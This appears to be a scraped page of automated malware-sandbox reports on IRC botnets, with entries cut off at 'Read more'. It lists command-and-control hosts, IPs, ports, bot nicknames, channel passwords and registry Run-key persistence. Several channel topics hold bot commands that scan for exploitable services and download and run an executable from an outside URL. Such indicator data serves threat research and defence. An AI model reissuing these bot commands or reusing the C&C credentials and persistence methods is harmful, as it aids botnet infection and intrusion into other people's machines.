Remote Host Port Number66.252.13.208 17000 NICK XP|Cah2USER laMer “” “flash.flassicensingservice.net” :You Think iaughtyUSERHOST XP|Cah2MODE XP|Cah2 +iJOIN #lbl# lamMODE #lbl#PONG :i5387D082.versanet.de Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallmIRC o HKEY_CURRENT_USERSoftwareMicrosoftMicrosoft Agent o HKEY_CURRENT_USERSoftwaremIRC o HKEY_CURRENT_USERSoftwaremIRCDateUsed * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + WinXPService = “%Windir%ie8mplayer.pif” so that mplayer.pif runsRead more...

i removed so that lamer cant harm people anymore here his infos remove.brooklyn-bitches.com 203.70.60.179 Opened listening TCP connection on port: 559 * C&C Server: 203.70.60.179:12351 * Server Password: * Username: rjrnz * Nickname: rjrnz * Channel: #.u (Password: 1980) * Channeltopic: here his real ip adressand his oper passwd oper JiM1 { from { userhostRead more...

66.252.13.212:16667 Nick: [AUT]XP-SP3[00]7380Username: fmeslrJoined Channel: #l# with Password lamChannel Topic for Channel #l#: “.advscan asn445 120 5 0 -r -b -s”

us.unicatz.com DNS_TYPE_A 66.252.13.214 1 66.252.13.214:2010 Nick: vnzznnscUsername: vnzznnscJoined Channel: #us# with Password d0s

b3.scorevidic.net 92.243.29.231 * C&C Server: 92.243.29.231:5900 * Server Password: * Username: VirUs * Nickname: VirUs-bxyjsayd * Channel: (Password: ) * Channeltopic: Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{13POP6M8-1MAD-24AD-JIM1-73OP5G2223335} “StubPath” = c:JAMACRAFTpop.exeReads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”HKEY_CURRENT_USERSoftwareMicrosoftVisual Basic6.0 “AllowUnsafeObjectPassing”HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”HKEY_LOCAL_MACHINESOFTWAREMicrosoftPCHealthErrorReporting “DoReport”HKEY_LOCAL_MACHINESOFTWAREMicrosoftPCHealthErrorReportingRead more...

carb0nf1ber.no-ip.org 94.129.166.204miraclezdohappen.homeip.net 94.129.132.83Outgoing connection to remote server: carb0nf1ber.no-ip.org TCP port 15966Outgoing connection to remote server: miraclezdohappen.homeip.net TCP port 15966Outgoing connection to remote server: miraclezdohappen.homeip.net TCP port 15966 Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun “Policies” = [REG_EXPAND_SZ, value: C:ProgrammeWindows Updatewinupdates.exe]HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun “Policies” = [REG_EXPAND_SZ, value: C:ProgrammeWindows Updatewinupdates.exe]HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “winupdates” = [REG_EXPAND_SZ, value: C:ProgrammeWindows Updatewinupdates.exe]HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “winupdates”Read more...

dec.ham-radio-op.net 208.20.225.248 * C&C Server: 208.20.225.248:6667 * Server Password: * Username: rruwlz * Nickname: jicifv * Channel: #dci (Password: dci2) * Channeltopic: : Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612} “StubPath” = c:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013ise12000.exeReads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel” File Changes by all processesNew Files c:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013Desktop.inic:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013ise12000.exec:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013ise12000.exeDeviceRasAcdOpened FilesRead more...

Requested Host: shv4.ath.cxResulting Address: 67.23.11.205 IRC DataUser Name: dpllhqHost Name: 0Server Name: Real Name: USA|5720Nick Name: USA|5720Non RFC Conform: 1ChannelName: #bote2Topic Deleted: :.msn | .rarinject | .scan vnc 100 5 999 -r | .scan dcom2-445 50 5 999 -r | .vnc http://www.ohsn.org/postales/cmd.exe | .dcom2-445 http://www.ohsn.org/postales/cmd.exe | .dl http://www.ohsn.org/postales/cmd.exe C:user.exe 1Private Message DeletedValue: :SecureServ!TS@stats.byroe.net PRIVMSG USA|5720Read more...

* Requested Host: usb.123back.com* Resulting Address: 89.46.101.186 * IRC Data o User Name: nbfspi o Host Name: “” o Server Name: o Real Name: nbfspi o Password: 913199 o Nick Name: vyjdkw o Non RFC Conform: 1 + Channel # Name: #n8# # Password: trb123trb + Notice Message Deleted # Value: :Code.Just.For.Me NOTICE AUTH :***Read more...

Remote Host Port Number ionela.youdontcare.com 6969 NICK eb00a2g USER natation “” “Lelystad.NL.EU.UnderNet.Org” :.12Cainele nu se simte amenintat de inteligenta ta. USERHOST eb00a2g NICK :vaffadt AWAY :.5damn , .2i’m good .6… MODE eb00a2g +i USER manzoni “” “Lelystad.NL.EU.UnderNet.Org” :.12ioti` inc`un dipendent de laba NICK :ld40zik MODE eb00a2g +iwx USER working2 “” “Lelystad.NL.EU.UnderNet.Org” :.12Ce as fute oRead more...